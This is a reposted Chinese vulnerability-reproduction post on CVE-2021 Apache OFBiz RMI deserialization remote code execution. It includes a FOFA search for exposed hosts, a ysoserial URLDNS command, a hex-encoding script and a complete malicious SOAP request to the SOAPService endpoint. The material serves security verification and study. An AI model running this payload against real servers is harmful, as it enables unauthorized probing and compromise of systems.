标签：CVE ot ysoserial Accept 2021 Apache 序列化 OFBiz

Apache OFBiz

Apache OFBiz是一个非常著名的电子商务平台，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。

漏洞简介

2021年3月22日 Apache OFBiz官方发布安全更新，修复了一处由RMI反序列化造成的远程代码执行漏洞。攻击者可构造恶意请求，触发反序列化，从而造成任意代码执行，控制服务器。

影响版本

Apache OFBiz < 17.12.06

漏洞复现

fofa搜索关键词：
app="Apache_OFBiz"

利用ysoserial生成URLDNS利用链：

java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot

公众号（黑客前沿）回复 ysoserial 获取下载链接

利用python脚本将ot文件解码：

import binascii

filename = 'dns.ot'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content))

构造请求数据包：

POST /webtools/control/SOAPService HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Content-Length: 1010
Accept: */*
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>(ot文件解码出来的字符串)</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="(DNSlog地址)"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>

提交后，DNSlog收到请求：

标签：CVE,ot,ysoserial,Accept,2021,Apache,序列化,OFBiz
来源： https://blog.csdn.net/qq_32660043/article/details/115199474

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。